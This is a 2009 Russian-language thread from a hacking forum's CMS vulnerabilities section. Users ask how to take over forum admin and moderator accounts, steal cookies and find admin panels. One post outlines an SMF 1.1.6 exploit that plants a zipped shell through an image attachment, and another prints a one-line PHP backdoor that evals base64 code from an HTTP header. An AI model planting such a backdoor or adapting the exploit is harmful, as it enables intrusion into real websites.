HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 10.08.2009, 10:00
M@ZAX@KEP
Участник форума
Регистрация: 11.06.2009
Сообщений: 159
С нами: 8903558

Репутация: 60
По умолчанию

Самый лучший способ знать всё - поиметь админку (в хорошем смысле) :-D
Про то как стырить и расшифровать хеш админки - другой раздел форума
 
Ответить с цитированием

  #2  
Старый 12.08.2009, 09:58
assas
Новичок
Регистрация: 12.08.2009
Сообщений: 1
С нами: 8814836

Репутация: 0
По умолчанию

Ребята, буду благодарен за совет. Взломали мой форум на phpbb3. Симптомы такие -он сам себя добавляет в пользователи, я запретил прикрепление файлов, а он добавляет картинку. В корне появилась куча файлов со странным расширением, но название сходны с оригинальными , типа зебра. Он сегодня ночью снова вернется. Как можно ему усложнить жизнь? Айпи меняет. Спасибо заранее
 
Ответить с цитированием

  #3  
Старый 13.08.2009, 02:53
leadtek
Новичок
Регистрация: 12.08.2009
Сообщений: 2
С нами: 8815299

Репутация: 0
По умолчанию

http://milw0rm.com/exploits/6993
Вот есть такой эксплойт для SMF 1.1.6
Работает по принципу:
1. Создает тему, в посте прикрепляется файл, g(zip) с шеллом.
2. Получает ссылку на прикрепленный файл, редактирует пост и добавляет [img]ссылка на файл[/img].
3. Когда админ заходит в тему и видит картинку, шелл распаковывается.
Все. Но... Не помог бы мне кто-нибудь подредактировать эксплойт, чтобы создавалась не тема, а просто писался пост в уже существующую тему?
 
Ответить с цитированием

  #4  
Старый 13.08.2009, 10:37
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
С нами: 10226672

Репутация: 441
По умолчанию

Цитата:
Сообщение от leadtek  
http://milw0rm.com/exploits/6993
Вот есть такой эксплойт для SMF 1.1.6
Работает по принципу:
1. Создает тему, в посте прикрепляется файл, g(zip) с шеллом.
2. Получает ссылку на прикрепленный файл, редактирует пост и добавляет [img]ссылка на файл[/img].
3. Когда админ заходит в тему и видит картинку, шелл распаковывается.
Все. Но... Не помог бы мне кто-нибудь подредактировать эксплойт, чтобы создавалась не тема, а просто писался пост в уже существующую тему?
А не проще это сделать всё руками? если алгоритм понятен?
 
Ответить с цитированием

  #5  
Старый 13.08.2009, 21:28
leadtek
Новичок
Регистрация: 12.08.2009
Сообщений: 2
С нами: 8815299

Репутация: 0
По умолчанию

Если бы все было бы ПОЛНОСТЬЮ понятно, то да %) Я не совсем, например, понял, что за шелл в архиве лежит...
Код:
if(isset($_SERVER['HTTP_SHELL'])) { print 1234567890;eval(base64_decode($_SERVER['HTTP_SHELL']));print 1234567890;exit(); }
Это случаем не он?
 
Ответить с цитированием

  #6  
Старый 14.08.2009, 00:34
probka
Banned
Регистрация: 13.06.2009
Сообщений: 12
С нами: 8901673

Репутация: 10
По умолчанию

Парни подскажити как изменить дату регестрации на форуме?
мне на локалке нужно сделать это
Если кто реально поможет вознагразу 3 баксами.
 
Ответить с цитированием

  #7  
Старый 16.08.2009, 13:01
Magister Yoda
Новичок
Регистрация: 14.08.2009
Сообщений: 16
С нами: 8811621

Репутация: 0
По умолчанию

нужен vBulletin версии 3.0.x
выложите кто-нибудь
в инете искал так и не нашёл, либо битая ссылка, либо нету сидеров
----------------------------------------------------------------------
уже найдено

Последний раз редактировалось Magister Yoda; 18.08.2009 в 11:20..
 
Ответить с цитированием

  #8  
Старый 16.08.2009, 15:04
jokertnt
Новичок
Регистрация: 18.01.2007
Сообщений: 15
С нами: 10163576

Репутация: 8
По умолчанию

Кто подгонет материал (темы) на получения прав главного модера на юкозе? (как куки стырить и т.д)
 
Ответить с цитированием

  #9  
Старый 17.08.2009, 14:56
CR~
Новичок
Регистрация: 16.04.2009
Сообщений: 1
С нами: 8984976

Репутация: 0
По умолчанию

Меня интересует, можно-ли как-нибудь поднять себе репутацию на форуме версии vBulletin® Version 3.8.3 ?
 
Ответить с цитированием

  #10  
Старый 05.09.2009, 15:08
HakaR
Участник форума
Регистрация: 23.07.2009
Сообщений: 261
С нами: 8843557

Репутация: 539
По умолчанию

Подскажите пожалуйста как узнать пути до панели администратора в vBulletin?
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.